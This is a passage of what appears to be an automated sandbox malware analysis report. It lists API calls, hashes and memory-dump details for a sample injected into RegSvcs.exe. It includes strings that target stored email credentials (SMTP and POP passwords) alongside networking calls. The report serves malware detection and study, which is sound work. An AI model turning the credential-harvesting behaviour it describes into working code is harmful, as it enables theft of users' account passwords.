Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopAccount, xrefs: 0040D0B6
EmailAddress, xrefs: 0040D074
SmtpPassword, xrefs: 0040D117
SmtpPort, xrefs: 0040D0EB
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
PopServer, xrefs: 0040D099
SmtpServer, xrefs: 0040D0DC
PopPort, xrefs: 0040D0A7
SmtpAccount, xrefs: 0040D0FA

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Analysis Process: aWBoUwiux.exePID: 5572, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	58
Total number of Limit Nodes:	6

Executed Functions

Function 028DD720 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 028DD79E
GetCurrentThread.KERNEL32 ref: 028DD7DB
GetCurrentProcess.KERNEL32 ref: 028DD818
GetCurrentThreadId.KERNEL32 ref: 028DD871

Memory Dump Source

Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a40fccbc85728e561c7f1b6897e48d2a7303404d9d01df349abf8164e9863bb3
Instruction ID: 2572fd981db1fd499d3377c1e76df3157370f7c90d44ba2329d99a68608fd549
Opcode Fuzzy Hash: a40fccbc85728e561c7f1b6897e48d2a7303404d9d01df349abf8164e9863bb3
Instruction Fuzzy Hash: 825147B4D002498FDB14DFAAD548B9EBBF1FF48304F20C459E419A7390D775A988CB65

Function 06F33DFC Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F3403E

Memory Dump Source

Source File: 00000009.00000002.2508343454.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f30000_aWBoUwiux.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a77b56c274347b58adcfd9267dc285136f02eb02042eadeadabcf958bdf23d1f
Instruction ID: c406bfb969e25b6397ad54ba139b78e4004922bfc6b1a93fdb49265dab6f2f5f
Opcode Fuzzy Hash: a77b56c274347b58adcfd9267dc285136f02eb02042eadeadabcf958bdf23d1f
Instruction Fuzzy Hash: A9A16D71D00669CFDB64DFA8C8417DEBBB2BF48310F148569E809A7244DB749985CF92

Function 06F33E08 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F3403E

Memory Dump Source

Source File: 00000009.00000002.2508343454.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f30000_aWBoUwiux.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e12e07cf3aa7749acebd74708cf2c771cbc6b5b0b526c7a03b14f92e803634f0
Instruction ID: 1c697148e78858cdd1135d05ffd8c0cccffe718e7fadc4383ca2ea34592aba9c
Opcode Fuzzy Hash: e12e07cf3aa7749acebd74708cf2c771cbc6b5b0b526c7a03b14f92e803634f0
Instruction Fuzzy Hash: DB916C71D00669CFDB64DFA8C8817DEBBB2BF48310F1485A9E809A7244DB749985CF92

Function 028DB478 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028DB6DE

Memory Dump Source

Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b2109b091bc333ce701e9369d092776fc65c3080b2c08baa39dba5264a1d7a8b
Instruction ID: 38685d32f4b1810af292f40fd0de126c34f0598dcaf792851fd2da25cd983d21
Opcode Fuzzy Hash: b2109b091bc333ce701e9369d092776fc65c3080b2c08baa39dba5264a1d7a8b
Instruction Fuzzy Hash: 298169B8A00B498FD724DF2AD05475ABBF2FF88308F11892DD48AD7A50D774E949CB91

Function 028D590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028D59C9

Memory Dump Source

Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 91136f00c4d74664d53c6c1b5b06e5c975f4acfc589bca2957a888cf6256b6b6
Instruction ID: 6628431d6b077cb38306cd687ff08b445658a73c7dfe501a2ab1c6d2047de93b
Opcode Fuzzy Hash: 91136f00c4d74664d53c6c1b5b06e5c975f4acfc589bca2957a888cf6256b6b6
Instruction Fuzzy Hash: EA41C3B4C0071DCBDB24DFA9C884BCEBBB5BF49304F60805AD408AB255DB756949CF91

Function 028D44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028D59C9

Memory Dump Source

Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7533f9f6d0232c2e1cde426c76d9fbf8516f12c536e16fd56a3cd1d0bcfd8a56
Instruction ID: 3bffddf0d8623dc306c0529950c77f2cbbe3d71bbb9411ae89fbba53bac1525d
Opcode Fuzzy Hash: 7533f9f6d0232c2e1cde426c76d9fbf8516f12c536e16fd56a3cd1d0bcfd8a56
Instruction Fuzzy Hash: 9341E2B4C0071DCBDB24DFA9C884BDDBBB5BF49304F60806AD408AB255DBB56989CF91

Function 028DD968 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028DD9EF

Memory Dump Source

Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

